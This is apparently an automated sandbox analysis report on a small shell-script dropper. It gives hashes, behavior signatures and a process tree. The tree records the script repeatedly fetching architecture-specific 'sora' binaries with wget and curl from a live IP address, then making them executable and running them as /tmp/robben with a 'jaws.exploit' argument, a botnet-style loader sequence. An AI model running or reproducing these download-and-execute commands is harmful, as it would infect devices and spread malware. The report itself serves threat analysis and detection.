Analysis
-
max time kernel
34s -
max time network
33s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 01:47
Static task
static1
Behavioral task
behavioral1
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
-
Size
2KB
-
MD5
891d1dcbed8ea0751d0c0d0fec39ae18
-
SHA1
57db06f345b0d9b4e2a7f4a502678a82ed792174
-
SHA256
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a
-
SHA512
20efcebab56d13d819a5fc0f1cdaf5952ec218e8ad4a8ecad863b5ccbbbc60bf82ad7bedb67196ae51c9c0156fce1a2279013018268560331c3b436762ed2992
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 741 chmod 822 chmod 785 chmod 830 chmod 847 chmod 885 chmod 729 chmod 769 chmod 816 chmod 863 chmod 879 chmod 735 chmod 754 chmod 805 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 730 robben /tmp/robben 736 robben /tmp/robben 742 robben /tmp/robben 755 robben /tmp/robben 770 robben /tmp/robben 786 robben /tmp/robben 806 robben /tmp/robben 817 robben /tmp/robben 823 robben /tmp/robben 831 robben /tmp/robben 848 robben /tmp/robben 865 robben /tmp/robben 880 robben /tmp/robben 886 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 733 curl 734 cat 732 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Processes
-
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh1⤵
- Writes file to tmp directory
PID:699 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:703
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Reads runtime system information
PID:727
-
-
/bin/catcat sora.x862⤵PID:728
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:730
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:732
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:733
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:734
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:736
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:738
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Reads runtime system information
PID:739
-
-
/bin/catcat sora.x86_642⤵PID:740
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:742
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:744
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Reads runtime system information
PID:746
-
-
/bin/catcat sora.i4682⤵PID:752
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:755
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:758
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Reads runtime system information
PID:761
-
-
/bin/catcat sora.i6862⤵PID:766
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:770
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:773
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Reads runtime system information
PID:776
-
-
/bin/catcat sora.mpsl2⤵PID:783
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:786
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:789
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Reads runtime system information
PID:792
-
-
/bin/catcat sora.arm42⤵PID:802
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:806
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:808
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Reads runtime system information
PID:814
-
-
/bin/catcat sora.arm52⤵PID:815
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:817
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:819
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Reads runtime system information
PID:820
-
-
/bin/catcat sora.arm62⤵PID:821
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:823
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:825
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Reads runtime system information
PID:826
-
-
/bin/catcat sora.arm72⤵PID:827
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-48e5b8b6487c42d8b9277acfd9dc6a30-systemd-timedated.service-OS8ihi2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:831
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:833
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Reads runtime system information
PID:837
-
-
/bin/catcat sora.ppc2⤵PID:845
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:848
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:851
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Reads runtime system information
PID:854
-
-
/bin/catcat sora.ppc440fp2⤵PID:862
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:865
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:867
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Reads runtime system information
PID:871
-
-
/bin/catcat sora.m68k2⤵PID:878
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:880
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:882
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Reads runtime system information
PID:883
-
-
/bin/catcat sora.sh42⤵PID:884
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:886
-